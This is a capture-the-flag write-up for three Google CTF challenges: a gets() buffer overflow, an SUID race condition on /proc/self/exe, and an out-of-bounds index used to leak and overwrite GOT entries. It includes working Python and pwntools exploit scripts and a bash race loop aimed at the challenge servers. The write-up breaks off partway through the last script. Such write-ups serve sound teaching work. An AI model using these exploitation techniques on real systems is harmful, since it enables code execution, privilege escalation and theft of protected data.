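def overflow(data, saved_rbp=ORIG_RBP, saved_rip=ORIG_RIP):
    """Model gets(): copy data plus a NUL over buffer | saved RBP | saved RIP."""
    frame = bytearray(BUF_SIZE) + struct.pack("<QQ", saved_rbp, saved_rip)
    written = data + b"\x00"         # gets() appends a NUL terminator
    frame[:len(written)] = written   # no bounds check, just like gets()
    return struct.unpack_from("<QQ", frame, BUF_SIZE)


first = overflow(b"A" * 256 + b"B" * 8)
second = overflow(b"A" * 256 + b"B" * 8 + b"C" * 4)

print([hex(v) for v in first])   # ['0x4242424242424242', '0x60606300']
print([hex(v) for v in second])  # ['0x4242424242424242', '0x43434343']
```

If the model is right, it also offers a plausible explanation for the first crash at 0x60606300: the NUL terminator written by gets zeroed the lowest byte of the return address, so execution resumed in the middle of an instruction in main. It also shows why 4 bytes of C’s are enough: the upper bytes of the saved address were already zero.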

With this knowledge in mind, let’s go ahead and write an exploit in Python that will overflow the message buffer, overwrite the saved RBP with 8 bytes of junk, and then write the address of the read_flag function over the saved return address. The program should then return into that function and print our flag.

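import socket
import struct
import telnetlib  # standard library in Python 2 and in Python 3 up to 3.12

# Address of read_flag, taken from the disassembly.
READ_FLAG = 0x606063A5

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("motd.ctfcompetition.com", 1337))

# Choose option 2 (Set user MOTD).
s.sendall(b"2\n")

# 256 bytes to fill the buffer, 8 bytes of junk over the saved RBP, then the
# low 4 bytes of the read_flag address in little-endian order.
buff = b"A"*256 + b"A"*8 + struct.pack("<I", READ_FLAG)
s.sendall(buff + b"\n")

# Hand the socket over to an interactive session so we can see the output.
t = telnetlib.Telnet()
t.sock = s
t.interact()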
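
As a small offline check of the payload, the sketch below rebuilds it with struct and verifies its shape before anything is sent. The helper name build_payload and the constants are my own labels for the values used above, not something taken from the challenge files.

```python
import struct

READ_FLAG = 0x606063A5  # address of read_flag from the disassembly
BUF_SIZE = 256          # size of the message buffer
SAVED_RBP_SIZE = 8      # saved RBP sits between the buffer and the return address


def build_payload(target):
    """Padding up to the return address, then the target's low 4 bytes (little-endian)."""
    padding = b"A" * (BUF_SIZE + SAVED_RBP_SIZE)
    return padding + struct.pack("<I", target)


payload = build_payload(READ_FLAG)
print(len(payload))         # 268
print(payload[-4:].hex())   # a5636060
print(b"\n" in payload)     # False: gets() would stop reading at a newline
```

Little-endian packing is why the address 0x606063A5 appears on the wire as A5 63 60 60. The newline check matters because gets stops at the first newline, so a payload containing the byte 0x0a would be cut short.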

Once our exploit is ready, let’s execute it and hope for the best!

root@kali:~/Google-CTF/Message Of The Day# python exploit.py 
Choose functionality to test:
1 - Get user MOTD
2 - Set user MOTD
3 - Set admin MOTD (TODO)
4 - Get admin MOTD
5 - Exit
choice: Enter new message of the day
New msg: New message of the day saved!
Admin MOTD is: CTF{m07d_1s_r3t_2_r34d_fl4g}
*** Connection closed by remote host ***

And there we have it, we got the flag!

FLAG: CTF{m07d_1s_r3t_2_r34d_fl4g}

Poetry

Upon reading the challenge description we learn that the Google-Haus is connected to the fridge, but unfortunately the credentials are only readable by root. Luckily for us, it seems there’s another SUID binary that has all the hallmarks of something suspicious.

From here, let’s connect to the poetry.ctfcompetition.com server on port 1337 and see what we have.

root@kali:~/Google-CTF/Poetry# nc poetry.ctfcompetition.com 1337
cd /home
ls -la
total 4
drwxrwxrwt  4 poetry poetry   80 Feb 25 03:02 .
drwxr-xr-x 21 poetry poetry 4096 Oct 24 19:10 ..
drwxr-xr-x  2 poetry poetry   80 Feb 25 03:02 poetry
drwxrwxrwx  2 poetry poetry   40 Feb 25 03:02 user
cd poetry
ls -la
total 900
drwxr-xr-x 2 poetry poetry     80 Feb 25 03:02 .
drwxrwxrwt 4 poetry poetry     80 Feb 25 03:02 ..
-r-------- 1 poetry poetry     19 Feb 25 03:02 flag
-rwsr-xr-x 1 poetry poetry 917192 Feb 25 03:02 poetry

Okay, it seems we have the flag and a binary called poetry. Let’s see what it does.

./poetry
./poetry test test

Huh… okay, nothing’s working, that’s odd.

Oh well, let’s go ahead and download the attachment and extract the files. Maybe the files in there will provide us some guidance.

root@kali:~/Google-CTF/Poetry# ls
poetry
root@kali:~/Google-CTF/Poetry# file poetry 
poetry: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.32, BuildID[sha1]=e453aa91df6a7a666a62fadfa8fb6fffaac5d9ba, not stripped

We see that we have another binary to dig into, so let’s open it up in IDA and see what it does.

Right from the start we see that the binary calls the getenv function to check whether LD_BIND_NOW is set. If it’s not set, the application jumps to loc_400A95, which reads the target of the /proc/self/exe symbolic link via readlink. On success readlink returns the number of bytes placed in the destination buffer; otherwise it returns -1 to signal an error.

If data is returned it then jumps to loc_400A2C.

The code for this portion of the application can be viewed as the following:

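char dest[4096] = {0};	/* size taken from the readlink call; zeroed because readlink does not NUL-terminate */
if (!getenv("LD_BIND_NOW"))
{
	/* Resolve the path of the running executable. */
	if (readlink("/proc/self/exe", dest, sizeof(dest)) == -1)
		err(1, "readlink");
}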

Okay, so we know what the first part of the application does. Let’s keep digging into the rest of it.

We see that after the readlink call succeeds, the application calls the setenv function and sets LD_BIND_NOW to 1. Once that’s done, the application jumps to loc_400A5E and re-runs the binary via the execv function. The new instance then checks again whether the LD_BIND_NOW environment variable has been set.

So the C code for the rest of this application should look like so:

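char dest[4096] = {0};	/* size taken from the readlink call; zeroed because readlink does not NUL-terminate */
if (!getenv("LD_BIND_NOW"))
{
	/* Resolve the path of the running executable. */
	if (readlink("/proc/self/exe", dest, sizeof(dest)) == -1)
		err(1, "readlink");
	/* Mark the environment so the next run skips this block. */
	if (setenv("LD_BIND_NOW", "1", 1))
		err(1, "setenv");
	/* Re-execute whatever path readlink returned. */
	if (execv(dest, argv))
		err(1, "execv");
}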
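
The decision the binary makes can be modelled as a pure function, which makes it easier to see where attacker-influenced data enters. This is a rough Python sketch of the logic above, not the binary’s actual code. The name plan_reexec is hypothetical, and the function only returns what would be executed instead of calling execv.

```python
def plan_reexec(environ, exe_link_target, argv):
    """Return None if LD_BIND_NOW is already set, else (path, argv, env) to exec."""
    if "LD_BIND_NOW" in environ:
        return None  # second run: skip the re-exec and carry on
    new_env = dict(environ, LD_BIND_NOW="1")
    # The path comes straight from readlink("/proc/self/exe") at run time.
    return exe_link_target, list(argv), new_env


print(plan_reexec({"LD_BIND_NOW": "1"}, "/home/poetry/poetry", ["./poetry"]))
print(plan_reexec({}, "/home/user/exp (deleted)", ["./exp", "../poetry/flag"])[0])
```

The point of the second call is that the program trusts whatever string the kernel reports for /proc/self/exe, so anything that changes that string between the start of the process and the readlink call changes which file gets executed.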

After looking over this code and file, it seems that a race condition might be present. Let me explain why I think this is true.

The binary first calls the readlink function, which gets the target of the /proc/self/exe symbolic link, that is, the path of the running application.

For example, if we copy over our Python binary, execute it, get the pid of the process and inspect /proc/pid/exe with ls (which uses readlink to print the target), we will see the path of the binary.

root@kali:/tmp# cp /usr/bin/python .
root@kali:/tmp# ./python 
Python 2.7.15+ (default, Nov 28 2018, 16:27:22) 
[GCC 8.2.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> 
[1]+  Stopped                 ./python
root@kali:/tmp# jobs -p
3805
root@kali:/tmp# ls -la /proc/3805/exe
lrwxrwxrwx 1 root root 0 Feb 24 21:27 /proc/3805/exe -> /tmp/python

Okay, but what happens if that file is deleted? What happens to the symbolic link?

root@kali:/tmp# rm /tmp/python 
root@kali:/tmp# ls -la /proc/3805/exe
lrwxrwxrwx 1 root root 0 Feb 24 21:27 /proc/3805/exe -> '/tmp/python (deleted)'

Interesting, it seems that our application now points to /tmp/python (deleted). So what would happen if we create our own file with the name python (deleted), would that execute? It actually would!
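
The same experiment can be scripted. The sketch below is Linux-only and makes a few assumptions: a sleep binary is on the PATH, the temporary directory allows execution, and the function name is my own. It runs a private copy of sleep, deletes the file while the process is alive, and reads /proc/<pid>/exe before and after.

```python
import os
import shutil
import subprocess
import tempfile


def exe_link_before_and_after_delete():
    """Run a private copy of sleep, delete it, and read /proc/<pid>/exe both times."""
    workdir = tempfile.mkdtemp()
    copy_path = os.path.join(workdir, "sleep")
    shutil.copy(shutil.which("sleep"), copy_path)  # copy keeps the executable bit
    proc = subprocess.Popen([copy_path, "30"])
    try:
        link = "/proc/{}/exe".format(proc.pid)
        before = os.readlink(link)
        os.remove(copy_path)       # the process keeps running without its file
        after = os.readlink(link)
    finally:
        proc.kill()
        proc.wait()
        shutil.rmtree(workdir, ignore_errors=True)
    return before, after


before, after = exe_link_before_and_after_delete()
print(before)
print(after)
```

The second line printed should be the first one with " (deleted)" appended, which is exactly the string a later readlink call would hand to execv.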

And because the application runs itself again, if we can somehow create a hard link to it and remove that link during execution, then the application should execute our “(deleted)” file, allowing us to run a binary of our choice with the privileges of the SUID binary’s owner.

So in this case, let’s copy over the cat binary and rename it to exp (deleted).

root@kali:~/Google-CTF/Poetry# nc poetry.ctfcompetition.com 1337
cd /home/user
cp /bin/cat 'exp (deleted)'

Once done, let’s execute a bash script that will continuously loop. In each iteration, we will use the ln command to create a hard link named exp that points to the poetry binary. Running exp therefore runs the SUID poetry binary under a name that we control.

After the link is created, we will execute exp against the flag, and then we will remove exp. Once exp is removed, /proc/self/exe will point to exp (deleted), which is the name of the cat binary that we copied over. If poetry calls readlink at that moment, it will re-execute our cat and print the flag!

Let’s give this a go!

while true; do ln /home/poetry/poetry ./exp; ( ./exp ../poetry/flag & ); rm exp; done
CTF{CV3-2009-1894}
/bin/bash: line 3: ./exp: No such file or directory
/bin/bash: fork: retry: No child processes

And just like that we got the flag!
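
For reference, one iteration of that loop looks like this in Python. It is only a sketch of the three shell steps (ln, run in the background, rm); the function name race_once is hypothetical, and winning the race still depends on the link being removed before the target calls readlink.

```python
import os
import subprocess


def race_once(target, link_path, args):
    """One loop iteration: hard-link the target, start the link, delete the link."""
    os.link(target, link_path)                    # ln target link_path
    proc = subprocess.Popen([link_path] + args)   # ( ./exp ... & )
    os.remove(link_path)                          # rm exp
    return proc


# Usage with the paths from this write-up (run from /home/user on the server):
# while True:
#     race_once("/home/poetry/poetry", "./exp", ["../poetry/flag"]).wait()
```

A hard link is used rather than a copy because a copy would belong to us and would lose the SUID owner, while a hard link is just another name for the same file.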

As a side note, CVE-2009-1894 was an actual Race Condition vulnerability in PulseAudio that utilized the same exploit as we just demonstrated.

FLAG: CTF{CV3-2009-1894}

Fridge Todo List

Upon reading the challenge description we learn that the smart fridge 2000 has a TODO list network service that Wintermuted seems to use as a password storage medium. It’s our job to find a bug that will leak the notes and possibly reveal the password.

Alright, with that in mind, let’s connect to the service and see what we can do.

root@kali:~/Google-CTF/Fridge Todo List# nc fridge-todo-list.ctfcompetition.com 1337
███████╗███╗   ███╗ █████╗ ██████╗ ████████╗    ███████╗██████╗ ██╗██████╗  ██████╗ ███████╗    ██████╗  ██████╗  ██████╗  ██████╗        
██╔════╝████╗ ████║██╔══██╗██╔══██╗╚══██╔══╝    ██╔════╝██╔══██╗██║██╔══██╗██╔════╝ ██╔════╝    ╚════██╗██╔═████╗██╔═████╗██╔═████╗       
███████╗██╔████╔██║███████║██████╔╝   ██║       █████╗  ██████╔╝██║██║  ██║██║  ███╗█████╗       █████╔╝██║██╔██║██║██╔██║██║██╔██║       
╚════██║██║╚██╔╝██║██╔══██║██╔══██╗   ██║       ██╔══╝  ██╔══██╗██║██║  ██║██║   ██║██╔══╝      ██╔═══╝ ████╔╝██║████╔╝██║████╔╝██║       
███████║██║ ╚═╝ ██║██║  ██║██║  ██║   ██║       ██║     ██║  ██║██║██████╔╝╚██████╔╝███████╗    ███████╗╚██████╔╝╚██████╔╝╚██████╔╝       
╚══════╝╚═╝     ╚═╝╚═╝  ╚═╝╚═╝  ╚═╝   ╚═╝       ╚═╝     ╚═╝  ╚═╝╚═╝╚═════╝  ╚═════╝ ╚══════╝    ╚══════╝ ╚═════╝  ╚═════╝  ╚═════╝        
                                                                                                                                          
 █████╗ ██████╗ ██╗   ██╗ █████╗ ███╗   ██╗ ██████╗███████╗██████╗     ████████╗ ██████╗ ██████╗  ██████╗     ██╗     ██╗███████╗████████╗
██╔══██╗██╔══██╗██║   ██║██╔══██╗████╗  ██║██╔════╝██╔════╝██╔══██╗    ╚══██╔══╝██╔═══██╗██╔══██╗██╔═══██╗    ██║     ██║██╔════╝╚══██╔══╝
███████║██║  ██║██║   ██║███████║██╔██╗ ██║██║     █████╗  ██║  ██║       ██║   ██║   ██║██║  ██║██║   ██║    ██║     ██║███████╗   ██║   
██╔══██║██║  ██║╚██╗ ██╔╝██╔══██║██║╚██╗██║██║     ██╔══╝  ██║  ██║       ██║   ██║   ██║██║  ██║██║   ██║    ██║     ██║╚════██║   ██║   
██║  ██║██████╔╝ ╚████╔╝ ██║  ██║██║ ╚████║╚██████╗███████╗██████╔╝       ██║   ╚██████╔╝██████╔╝╚██████╔╝    ███████╗██║███████║   ██║   
╚═╝  ╚═╝╚═════╝   ╚═══╝  ╚═╝  ╚═╝╚═╝  ╚═══╝ ╚═════╝╚══════╝╚═════╝        ╚═╝    ╚═════╝ ╚═════╝  ╚═════╝     ╚══════╝╚═╝╚══════╝   ╚═╝   
user: admin


Hi admin, what would you like to do?
1) Print TODO list
2) Print TODO entry
3) Store TODO entry
4) Delete TODO entry
5) Remote administration
6) Exit
> 

It seems that the service asks for a username. I entered admin thinking it would do something special, but it didn’t. We also see that we have access to a few options. The remote administration option is the most interesting, so let’s see if it works.

Hi admin, what would you like to do?
1) Print TODO list
2) Print TODO entry
3) Store TODO entry
4) Delete TODO entry
5) Remote administration
6) Exit
> 5


Sorry, remote administration is not available right now.

I really don’t know what I was expecting… Anyways, let’s go ahead and download the attachment and extract the files to see what else we have to work with.

root@kali:~/Google-CTF/Fridge Todo List# ls
todo  todo.c
root@kali:~/Google-CTF/Fridge Todo List# file todo
todo: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=62100af46a33d62b1f40ab39375b25f9062180af, not stripped
root@kali:~/Google-CTF/Fridge Todo List# file todo.c 
todo.c: C source, UTF-8 Unicode text

We see that we have both the todo binary and its source code. Upon viewing the source code we are provided with the following.

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <err.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <stdbool.h>
#include <ctype.h>
#include <linux/limits.h>

const char BANNER[] = "\
███████╗███╗   ███╗ █████╗ ██████╗ ████████╗    ███████╗██████╗ ██╗██████╗  ██████╗ ███████╗    ██████╗  ██████╗  ██████╗  ██████╗        \n\
██╔════╝████╗ ████║██╔══██╗██╔══██╗╚══██╔══╝    ██╔════╝██╔══██╗██║██╔══██╗██╔════╝ ██╔════╝    ╚════██╗██╔═████╗██╔═████╗██╔═████╗       \n\
███████╗██╔████╔██║███████║██████╔╝   ██║       █████╗  ██████╔╝██║██║  ██║██║  ███╗█████╗       █████╔╝██║██╔██║██║██╔██║██║██╔██║       \n\
╚════██║██║╚██╔╝██║██╔══██║██╔══██╗   ██║       ██╔══╝  ██╔══██╗██║██║  ██║██║   ██║██╔══╝      ██╔═══╝ ████╔╝██║████╔╝██║████╔╝██║       \n\
███████║██║ ╚═╝ ██║██║  ██║██║  ██║   ██║       ██║     ██║  ██║██║██████╔╝╚██████╔╝███████╗    ███████╗╚██████╔╝╚██████╔╝╚██████╔╝       \n\
╚══════╝╚═╝     ╚═╝╚═╝  ╚═╝╚═╝  ╚═╝   ╚═╝       ╚═╝     ╚═╝  ╚═╝╚═╝╚═════╝  ╚═════╝ ╚══════╝    ╚══════╝ ╚═════╝  ╚═════╝  ╚═════╝        \n\
                                                                                                                                          \n\
 █████╗ ██████╗ ██╗   ██╗ █████╗ ███╗   ██╗ ██████╗███████╗██████╗     ████████╗ ██████╗ ██████╗  ██████╗     ██╗     ██╗███████╗████████╗\n\
██╔══██╗██╔══██╗██║   ██║██╔══██╗████╗  ██║██╔════╝██╔════╝██╔══██╗    ╚══██╔══╝██╔═══██╗██╔══██╗██╔═══██╗    ██║     ██║██╔════╝╚══██╔══╝\n\
███████║██║  ██║██║   ██║███████║██╔██╗ ██║██║     █████╗  ██║  ██║       ██║   ██║   ██║██║  ██║██║   ██║    ██║     ██║███████╗   ██║   \n\
██╔══██║██║  ██║╚██╗ ██╔╝██╔══██║██║╚██╗██║██║     ██╔══╝  ██║  ██║       ██║   ██║   ██║██║  ██║██║   ██║    ██║     ██║╚════██║   ██║   \n\
██║  ██║██████╔╝ ╚████╔╝ ██║  ██║██║ ╚████║╚██████╗███████╗██████╔╝       ██║   ╚██████╔╝██████╔╝╚██████╔╝    ███████╗██║███████║   ██║   \n\
╚═╝  ╚═╝╚═════╝   ╚═══╝  ╚═╝  ╚═╝╚═╝  ╚═══╝ ╚═════╝╚══════╝╚═════╝        ╚═╝    ╚═════╝ ╚═════╝  ╚═════╝     ╚══════╝╚═╝╚══════╝   ╚═╝   ";

const char MENU[] = "\n\
Hi %s, what would you like to do?\n\
1) Print TODO list\n\
2) Print TODO entry\n\
3) Store TODO entry\n\
4) Delete TODO entry\n\
5) Remote administration\n\
6) Exit\n\
> ";
const char OUT_OF_BOUNDS_MESSAGE[] = "Sorry but this model only supports 128 TODO list entries.\nPlease upgrade to the Smart Fridge 3001 for increased capacity.";

#define TODO_COUNT 128
#define TODO_LENGTH 48

int todo_fd;
char username[64];
char todos[TODO_COUNT*TODO_LENGTH];

void init() {
  system("mkdir todos 2>/dev/null");
  setlinebuf(stdout);
}

void read_line(char *buf, size_t buf_sz) {
  if (!fgets(buf, buf_sz, stdin)) {
    err(1, "fgets()");
  }
  size_t read_cnt = strlen(buf);
  if (read_cnt && buf[read_cnt-1] == '\n') {
    buf[read_cnt-1] = 0;
  }
}

bool read_all(int fd, char *buf, size_t read_sz) {
  while (read_sz) {
    ssize_t num_read = read(fd, buf, read_sz);
    if (num_read <= 0) {
      return false;
    }
    read_sz -= num_read;
    buf += num_read;
  }
  return true;
}

void write_all(int fd, char *buf, size_t write_sz) {
  while (write_sz) {
    ssize_t num_written = write(fd, buf, write_sz);
    if (num_written <= 0) {
      err(1, "write");
    }
    write_sz -= num_written;
    buf += num_written;
  }
}

bool string_is_alpha(const char *s) {
  for (; *s; s++) {
    if (!isalpha(*s)) {
      return false;
    }
  }
  return true;
}

bool list_is_empty() {
  for (int i = 0; i < TODO_COUNT; i++) {
    if(todos[i*TODO_LENGTH]) {
      return false;
    }
  }
  return true;
}

void print_list() {
  if (list_is_empty()) {
    puts("Your TODO list is empty. Enjoy your free time!");
    return;
  }
  puts("+=====+=================================================================+");
  for (int i = 0; i < TODO_COUNT; i++) {
    if(todos[i*TODO_LENGTH]) {
      printf("| %3d | %-63s |\n", i, &todos[i*TODO_LENGTH]);
    }
  }
  puts("+=====+=================================================================+");
}

void open_todos() {
  char todos_filename[PATH_MAX] = "todos/";
  strncat(todos_filename, username, sizeof(todos_filename)-strlen(todos_filename) - 1);

  todo_fd = open(todos_filename, O_RDWR);
  if (todo_fd != -1 && read_all(todo_fd, todos, sizeof(todos))) {
    if (!list_is_empty()) {
      print_list();
    }
  } else {
    todo_fd = open(todos_filename, O_RDWR | O_CREAT | O_TRUNC, 0600);
    if (todo_fd == -1) {
      err(1, "Could not create TODO storage file");
    }
  }
}

void authenticate() {
  printf("user: ");
  fflush(stdout);
  read_line(username, sizeof(username));

  if (!string_is_alpha(username)) {
    errx(1, "username can only consist of [a-zA-Z]");
  }
}

int read_int() {
  char buf[128];
  read_line(buf, sizeof(buf));
  return atoi(buf);
}

void store_todos() {
  write_all(todo_fd, todos, sizeof(todos));
  close(todo_fd);
}

void store_todo() {
  printf("In which slot would you like to store the new entry? ");
  fflush(stdout);
  int idx = read_int();
  if (idx > TODO_COUNT) {
    puts(OUT_OF_BOUNDS_MESSAGE);
    return;
  }
  printf("What's your TODO? ");
  fflush(stdout);
  read_line(&todos[idx*TODO_LENGTH], TODO_LENGTH);
}

void print_todo() {
  printf("Which entry would you like to read? ");
  fflush(stdout);
  int idx = read_int();
  if (idx > TODO_COUNT) {
    puts(OUT_OF_BOUNDS_MESSAGE);
    return;
  }
  printf("Your TODO: %s\n", &todos[idx*TODO_LENGTH]);
}

void delete_todo() {
  printf("Which TODO number did you finish? ");
  fflush(stdout);
  int idx = read_int();
  if (idx > TODO_COUNT) {
    puts(OUT_OF_BOUNDS_MESSAGE);
    return;
  }
  todos[idx*TODO_LENGTH] = 0;
  if (list_is_empty()) {
    puts("Awesome, you cleared the whole list!");
  } else {
    puts("Nice job, keep it up!");
  }
}

bool administration_enabled() {
  return false;
}

void admin() {
  puts("Sorry, remote administration is not available right now.");
}

int main(int argc, char *argv[]) {
  init();

  puts(BANNER);

  authenticate();

  open_todos();

  while (true) {
    printf(MENU, username);
    fflush(stdout);
    int choice = read_int();
    puts("");
    switch (choice) {
      case 1:
        print_list();
        break;
      case 2:
        print_todo();
        break;
      case 3:
        store_todo();
        break;
      case 4:
        delete_todo();
        break;
      case 5:
        admin();
        break;
      case 6:
        store_todos();
        puts("Your TODO list has been stored. Have a nice day!");
        return 0;
      default:
        printf("unknown option %d\n", choice);
        break;
    }
  }
}

Looking into the code, I see that option 5 runs the admin function. Let’s see what that does.

bool administration_enabled() {
  return false;
}

void admin() {
  puts("Sorry, remote administration is not available right now.");
}

Well, that was a bust. It doesn’t do anything except print the string we just saw, and administration_enabled isn’t even used anywhere. We need to keep digging.

Okay, let’s start from the top of the menu and work our way down. When we choose the first option, case 1 is selected and calls the print_list function.

void print_list() {
  if (list_is_empty()) {
    puts("Your TODO list is empty. Enjoy your free time!");
    return;
  }
  puts("+=====+=================================================================+");
  for (int i = 0; i < TODO_COUNT; i++) {
    if(todos[i*TODO_LENGTH]) {
      printf("| %3d | %-63s |\n", i, &todos[i*TODO_LENGTH]);
    }
  }
  puts("+=====+=================================================================+");
}

This function prints all the saved TODO strings from the todos array. The loop index is bounded by TODO_COUNT, so there doesn’t seem to be a bug here.

What about option 2, which allows us to print a specific TODO entry? Looking into the code we see that option two or case 2 calls the print_todo function.

void print_todo() {
  printf("Which entry would you like to read? ");
  fflush(stdout);
  int idx = read_int();
  if (idx > TODO_COUNT) {
    puts(OUT_OF_BOUNDS_MESSAGE);
    return;
  }
  printf("Your TODO: %s\n", &todos[idx*TODO_LENGTH]);
}

Right away I can spot an issue with this portion of the code. Take a look at the idx variable. This variable is a signed integer!

int idx = read_int();
if (idx > TODO_COUNT) {

The if statement only checks whether idx is larger than TODO_COUNT, which is defined at the start of the application.

#define TODO_COUNT 128

So what happens if idx is a negative number? The check passes, and idx*TODO_LENGTH becomes a negative offset. Are we able to read memory located before the todos array?

Let’s also look at option 3, which calls the store_todo function.

void store_todo() {
  printf("In which slot would you like to store the new entry? ");
  fflush(stdout);
  int idx = read_int();
  if (idx > TODO_COUNT) {
    puts(OUT_OF_BOUNDS_MESSAGE);
    return;
  }
  printf("What's your TODO? ");
  fflush(stdout);
  read_line(&todos[idx*TODO_LENGTH], TODO_LENGTH);
}

We have the same issue! So we have an out-of-bounds read vulnerability and also an out-of-bounds write (a limited write-what-where condition), which should allow us to read data located before the todos array in memory, and also write to it.
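
To make the missing lower-bound check concrete, here is a small Python model of the index check and offset arithmetic shared by print_todo and store_todo. It is only a sketch: the helper names passes_check and byte_offset are made up for illustration, and only TODO_COUNT, TODO_LENGTH and the comparison itself come from the source above.

```python
TODO_COUNT = 128   # from the challenge source
TODO_LENGTH = 48   # from the challenge source

def passes_check(idx):
    """Mirror `if (idx > TODO_COUNT) return;` (hypothetical helper name)."""
    return not (idx > TODO_COUNT)

def byte_offset(idx):
    """Offset of &todos[idx*TODO_LENGTH] relative to the start of todos."""
    return idx * TODO_LENGTH

if __name__ == "__main__":
    for idx in (0, 127, 128, 129, -1, -6):
        print(idx, passes_check(idx), byte_offset(idx))
```

Negative indexes pass the check and produce negative offsets, which is exactly what we want to abuse. Index 128 also passes, even though the last valid slot is 127.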

Let’s open the todo binary in IDA and see if we can find the store_todo function.

Inside store_todo, let’s double click on the todos reference to see where in memory the array is stored.

Okay, so it seems that todos is stored in the .bss section, which is used for statically allocated variables, at offset 0x203140. Note that this is not the stack: todos is a global array.

Since we can enter a negative number, we should be able to reach memory located before todos. So let’s scroll up from this section to see what we can read and possibly overwrite.

Awesome, it seems that the GOT (Global Offset Table) sits just above us. Together with the PLT (Procedure Linkage Table), it is used to call external functions whose addresses aren’t known at link time and are left to be resolved by the dynamic linker at run time.

LiveOverflow has a great video explaining the GOT and PLT, which I suggest you watch!

So if we can read from and write to these GOT entries, then we can redirect a call to a function of our choosing, like system.

But before we can do that, let’s check the protections in place for the application.

root@kali:~/Google-CTF/Fridge Todo List# checksec todo
[*] '/root/Google-CTF/Fridge Todo List/todo'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled

Darn, we can see that PIE (Position Independent Executable) is enabled for this binary. This allows the binary itself to be loaded at a random base address under ASLR (address space layout randomization), which is used to prevent attackers from knowing where existing executable code is. On the bright side, Partial RELRO means the GOT is still writable.

While this would normally cause headaches for certain exploits, we’re fine! That’s because we have the ability to read and leak memory addresses. So we can write an exploit that leaks a current address and uses it for further exploitation, allowing us to sidestep ASLR.

Also take note of the following C line in the store_todo function.

read_line(&todos[idx*TODO_LENGTH], TODO_LENGTH);

At the start of the application we define the TODO_LENGTH with the following line of code: #define TODO_LENGTH 48.

This means that we can only move through memory in steps of 48 bytes, which can be a problem because we can’t land on an arbitrary address. Let’s see what memory addresses we can reach from the todos address.

root@kali:~/Google-CTF/Fridge Todo List# python
Python 2.7.15+ (default, Nov 28 2018, 16:27:22) 
[GCC 8.2.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> todo_addrs = 0x0203140
>>> for x in range(7):
...     hex(todo_addrs - 48 * x)
... 
'0x203140'
'0x203110'
'0x2030e0'
'0x2030b0'
'0x203080'
'0x203050'
'0x203020'

Taking the last memory address of 0x203020, let’s go back into IDA, press G and enter the address.

Press OK and we should then see what memory region we can access.

Awesome, so if we jump 288 (6*48) bytes back then we end up in the GOT where the write function is stored.
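
The same arithmetic can be turned around: given a target offset, divmod tells us which negative index reaches it and how many bytes into the 48-byte slot it sits. This is a minimal sketch, assuming the todos offset 0x203140 seen in IDA; slot_for is a hypothetical helper name.

```python
TODOS = 0x203140   # offset of the todos array as shown in IDA
TODO_LENGTH = 48

def slot_for(target, base=TODOS, slot_size=TODO_LENGTH):
    """Return (index, bytes_into_slot) for a target offset (hypothetical helper)."""
    return divmod(target - base, slot_size)

if __name__ == "__main__":
    idx, skip = slot_for(0x203020)
    print(idx, skip)
```

A skip of 0 means the target starts exactly at the beginning of a slot. A non-zero skip means that many padding bytes have to be written (or read past) before reaching the target.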

Let’s write a simple Python exploit to leak that address and print it out for us.

from pwn import *
import socket
import struct

s = remote('fridge-todo-list.ctfcompetition.com',1337)

s.send("admin\n")
s.send("2\n")
s.send("-6\n")
s.recvuntil("Your TODO: ")
leak = s.recvuntil("\n")[:-1]

while len(leak) < 8:
	leak += "\0"

leak = struct.unpack("<Q", leak[:8])[0]
print "Leaked Address: %x" % leak

Once we have our skeleton exploit ready, let’s execute it.

root@kali:~/Google-CTF/Fridge Todo List# python exploit.py 
[+] Opening connection to fridge-todo-list.ctfcompetition.com on port 1337: Done
Leaked Address: 55d0e28fb916
[*] Closed connection to fridge-todo-list.ctfcompetition.com port 1337
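
The padding loop in the script exists because printf with %s stops at the first NUL byte, so only the non-zero low bytes of the pointer come back over the socket. Below is a Python 3 flavoured sketch of that decoding step, fed with the bytes that correspond to the address printed above; parse_leak is a hypothetical helper name.

```python
import struct

def parse_leak(raw):
    """Pad a leaked little-endian pointer to 8 bytes and unpack it."""
    return struct.unpack("<Q", raw[:8].ljust(8, b"\x00"))[0]

if __name__ == "__main__":
    raw = bytes.fromhex("16b98fe2d055")   # little-endian bytes of 0x55d0e28fb916
    print(hex(parse_leak(raw)))
```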

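The leaked address ends in 0x916. Because of PIE only the low bits are meaningful, so we need to find which offset in the binary ends in 916. Since write has not been called yet at this point, its GOT entry should still point back into the PLT, so let’s check there.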

In IDA, press CTRL+S to bring up segments, and double click on the .plt segment.

Once you double click that segment you will be brought to the graph view. From there press SPACE to bring up the address view and find 916.

Awesome, so we are in fact in the PLT. With the leaked pointer into write’s PLT stub we can now calculate the base address of the binary by subtracting 0x916 from our leaked address. Once that’s calculated we can get the address of other PLT entries, like system, by adding their offsets to the base.

So let’s find the offset for system. Let’s go back into IDA and in the PLT table find system.

Double click that to follow the cross reference and we should get the offset for system, which should be 0x940.
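
Putting those two offsets together, the arithmetic looks like this. It is a sketch that reuses the address leaked in the earlier run; the offsets 0x916 and 0x940 are the ones read from IDA above, and the constant and function names are illustrative.

```python
WRITE_LEAK_OFFSET = 0x916   # offset the leaked write pointer ends in (from IDA)
SYSTEM_PLT_OFFSET = 0x940   # offset of system in the PLT (from IDA)

def resolve(leak):
    """Return (binary_base, system_address) computed from the leaked pointer."""
    base = leak - WRITE_LEAK_OFFSET
    return base, base + SYSTEM_PLT_OFFSET

if __name__ == "__main__":
    base, system = resolve(0x55d0e28fb916)
    print(hex(base), hex(system))
```

A quick sanity check is that the computed base is page-aligned, meaning its low 12 bits are zero. If it isn’t, the leak or the offset is wrong.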

Great, now that we have that we can update our exploit code.

from pwn import *
import socket
import struct

s = remote('fridge-todo-list.ctfcompetition.com',1337)

s.send("admin\n")
s.send("2\n")
s.send("-6\n")
s.recvuntil("Your TODO: ")
leak = s.recvuntil("\n")[:-1]

while len(leak) < 8:
	leak += "\0"

